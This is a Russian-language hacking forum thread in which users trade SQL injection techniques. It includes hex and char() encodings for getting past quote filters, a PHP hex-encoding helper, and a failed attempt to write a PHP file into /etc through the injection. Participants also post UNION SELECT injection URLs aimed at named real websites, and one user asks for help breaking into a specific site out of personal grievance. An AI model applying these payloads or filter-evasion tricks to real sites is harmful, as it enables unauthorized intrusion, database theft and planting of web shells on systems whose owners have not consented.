Посмотри на ошибку. Берётся целочисленное значение id, остальное не принимается. Такое не раскрутить скорей всего.
Code: The value "22' and 1=(select @@version)--" cannot be converted to a number The error occurred in E:\RussianBeat\code\news.cfm: line 7 5 : <cfif #parameterexists(article)#> 6 : <cfif #len(article)# gt 0> 7 : id = #int(article)# and 8 : <cfset fullarticle=true> 9 : </cfif> читай внимательнее про СУБД там вообще речи нет. в скрипте ошибка при приведении типов (ака кастинг).
Так скажет ктонить - как обойти эти долбаные < > в скл запросе ? С кавычками всё ясно - не прокатит,ибо гласит спецификация кавычки натуральными оставлять =_=.
Code: <form action='<? $PHP_SELF; ?>' method=POST> <input type=text name='hex'> <input type=SUBMIT value="OK"> </form> <? error_reporting(0); echo "$hex= "; echo("0x".bin2hex("$hex")) ?> Должно помочь.
USAkid action='<? $PHP_SELF; ?>' можно опустить echo "$hex= "; может echo "hex= "; ? echo("0x".bin2hex("$hex")) без включенного register globals работать не будет
Не, я делал с рассчетом на то, чтобы кодируемая строка отображалась = сам hex К примеру /etc/passwd= 0x2f6574632f706173737764
Как можно провести запрос в БД MySQL если одинарная кавычка фильтруется? Пример запроса: UPDATE namedb.pfx_table SET column = 'e10adc3949ba59abbe56e057f20f883e' WHERE pfx_tble.id =1 LIMIT 1 пробывал использовать char() не вышло Пример: UPDATE namedb.pfx_table SET column = char(0x27653130616463333934396261353961626265353665303537663230663838336527) WHERE pfx_tble.id =1 LIMIT 1
Code: UPDATE namedb.pfx_table SET column = 0x6531306164633339343962613539616262653536653035376632306638383365 WHERE pfx_tble.id =1 LIMIT 1 или UPDATE namedb.pfx_table SET column = char(0x65,0x31,...) WHERE pfx_tble.id =1 LIMIT 1 одинарную кавычку не нужно хексить
Разобрался, оказывается я с чаром напутал запрос должен был выглядеть так: UPDATE namedb.pfx_table SET column = char(92,39,101,49,48,97,100,99,51,57,52,57,98,97,53,57,97,98,98,101,53,54,101,48,53,55,102,50,48,102,56,56,51,101,92,39) WHERE pfx_tble.id =1 LIMIT 1 И как бы это печальным не показалось, но запрос провести не возможно через обычную SQL инъекцию и File_priv = No
День добрый!... Болею, дома валяюсь один.... И вот решил воплотить в жизнь одну мечту. сайтоломанием заняться. не в плохом понимании, конечно же. а именно те, которые есть за что ломать. вот адресс _http://www.youvebeenleftbehind.com Кое-что нашёл _http://www.youvebeenleftbehind.com/WebResource.axd?d=0' Если с этим что-то можно сделать, то как? Причина взлома- "кто зарегается на их сайте и даст 40 баксов, тот попадёт в рай, а стальные останутся на Земле под 7-ми летним правлением антихриста"... Короче деньги имеют с глупых граждан. p.s.: Объясните мне, как ламеру. а то всё, что я в своей жизни видел из программирования, так это Delphi... причём уже 4 года не занимался этим.
Code: http://www.isc.org.au/display_page.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+20,1/* Code: http://www.guillembalague.com/interview_desp.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES/* my1476340166B@localhost
60% понял из того,что ты написал. А что ты собирался взломатьн а том сайте?))То,что ты написал - на sql никак не тянет))
Нельзя хексить путь файла в который сохраняешь. Хексить же записываемые данные можно. Без кавычек ес-но
Всё прошло успешно,кроме одного - нет прав на запись/чтение файлов в каталоге ( Can't create/write to file '/etc/gaga.php' (Errcode: 13 ) ).Означает ли это,что мне никуда нельзя осуществлять запись,кроме папки /tmp ? И если нет, то как найти папку,в которую можно осуществлять запись ?
